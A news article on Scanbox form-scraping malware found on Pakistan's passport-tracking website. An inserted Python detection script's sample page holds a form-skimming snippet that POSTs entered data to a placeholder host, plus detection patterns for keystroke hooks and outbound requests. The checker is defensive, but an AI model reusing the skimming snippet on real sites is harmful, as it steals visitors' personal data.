Hackers infected Pakistani immigration website with data-scraping Scanbox malware

If you are planning to visit Pakistan soon, you may want to postpone your trip for a while as the Pakistani government's website for immigration and passport services has been leaking personal details of passport applicants to hackers.

Researchers at security firm Trustwave recently observed that hackers had breached tracking.dgip.gov.pk, a website owned by the Directorate General of Immigration & Passport of the Pakistani government, and injected a payload known as the Scanbox Framework into the domain.

Scanbox is a well-known malware payload widely used by cyber criminals to gather information about visitors to targeted websites and to scrape the data visitors type into online forms. While it is not known when Scanbox was injected into the Pakistani government's website for immigration and passport services, researchers are certain that the hackers behind the payload have been harvesting detailed personal information from people who visited the domain in the recent past.

The researchers first observed Scanbox on the breached website on 2nd March and on that day alone, Scanbox managed to collect information on at least 70 unique site visitors, about a third of them with recorded credentials.

Scanbox used in multiple cyber attack campaigns

"Scanbox Framework is a reconnaissance framework that was first mentioned back in 2014 and has been linked over the years to several different APT groups. Its intense activity during the 2014-2015 years has been well-covered in a paper written by PwC. It was then seen again in 2017 suspected to be used by the Stone Panda APT group, and once more in 2018 in connection with LuckyMouse.

"Scanbox was used in a variety of watering hole attacks, meaning the attacker infected a site with Scanbox in order to gather information about visitors to the site (gathering all the information you’d expect like IP, referrer, OS, User Agent, plugins, etc.) to, later on, tailor sophisticated targeted attacks for interesting visitors. With every appearance, it seems to have evolved in terms of the kinds of information it gathers," Trustwave said.
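The injection described above is a script added to a legitimate page that fingerprints visitors and copies what they type into forms to an attacker-controlled host. The following is an added example, not code from Trustwave or from the Scanbox framework, of the kind of page-integrity check a site operator can run over the HTML they serve: it lists every external script host outside an allowlist and flags inline scripts that both hook form or keystroke events and send data off-site. The sample page, the `collector.example.invalid` hostname and the allowlist are constructed for illustration; only `tracking.dgip.gov.pk` comes from the article.

```python
"""
Added example (not from the Trustwave report or Scanbox itself): a small
integrity check a site operator can run over served HTML to spot an injected
reconnaissance/form-scraping script of the kind described in the article.
Findings:
  * external_script_offsite: <script src> loaded from a host not on the allowlist
  * inline_form_capture:     inline script that hooks form/keystroke events AND
                             contains an outbound-request call
All hostnames other than tracking.dgip.gov.pk are placeholders.
"""
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Hosts this site legitimately loads scripts from (assumption: site-specific).
ALLOWED_SCRIPT_HOSTS = {"tracking.dgip.gov.pk", "www.dgip.gov.pk"}

# Indicators of form/keystroke hooking in inline JavaScript.
CAPTURE_PATTERNS = [
    r"addEventListener\(\s*['\"](keydown|keypress|keyup|input|change|submit)['\"]",
    r"\.on(keydown|keypress|keyup|submit)\s*=",
]
# Indicators that the script sends data somewhere.
EXFIL_PATTERNS = [
    r"\bfetch\(", r"XMLHttpRequest", r"navigator\.sendBeacon", r"new\s+Image\(",
]


class ScriptCollector(HTMLParser):
    """Collects external script URLs and inline script bodies from a page."""

    def __init__(self):
        super().__init__()
        self.external = []
        self.inline = []
        self._in_script = False
        self._buf = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() != "script":
            return
        src = dict(attrs).get("src")
        if src:
            self.external.append(src)
        else:
            self._in_script = True
            self._buf = []

    def handle_data(self, data):
        if self._in_script:
            self._buf.append(data)

    def handle_endtag(self, tag):
        if tag.lower() == "script" and self._in_script:
            self.inline.append("".join(self._buf))
            self._in_script = False


def audit_page(html, page_host, allowed_hosts=ALLOWED_SCRIPT_HOSTS):
    """Return a list of (finding_kind, detail) tuples for the given HTML."""
    parser = ScriptCollector()
    parser.feed(html)
    findings = []
    for src in parser.external:
        host = urlparse(src).hostname
        if host is None:          # relative URL: served by the page's own host
            host = page_host
        if host not in allowed_hosts:
            findings.append(("external_script_offsite", src))
    for body in parser.inline:
        hooks_input = any(re.search(p, body) for p in CAPTURE_PATTERNS)
        sends_data = any(re.search(p, body) for p in EXFIL_PATTERNS)
        if hooks_input and sends_data:
            findings.append(("inline_form_capture", body.strip()[:60]))
    return findings


# Constructed sample page: one legitimate relative script, one injected off-site
# loader, and one inline snippet that hooks a form and posts it off-site.
SAMPLE_HTML = """<html><head>
<script src="/static/app.js"></script>
<script src="https://collector.example.invalid/j.js"></script>
</head><body>
<form id="f"><input name="applicant"></form>
<script>
document.getElementById('f').addEventListener('submit', function(e){
  fetch('https://collector.example.invalid/c', {method:'POST', body: new FormData(e.target)});
});
</script>
</body></html>"""

if __name__ == "__main__":
    for kind, detail in audit_page(SAMPLE_HTML, "tracking.dgip.gov.pk"):
        print(kind, detail)
```

Run against a periodic fetch of each public page and diffed against a known-good baseline, this turns a silent injection into an alert; the allowlist and the two pattern sets are the parts to tune per site, and a match on `inline_form_capture` is a prompt to read the script, not a verdict on its own.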

According to the firm, the Pakistani government has neither responded to its report of Scanbox on the website nor taken any action to remove the payload from the affected site. Until it does, people should avoid visiting the domain or entering any personal information on it, to keep their data out of the hands of cyber criminals.

Copyright Lyonsdown Limited 2021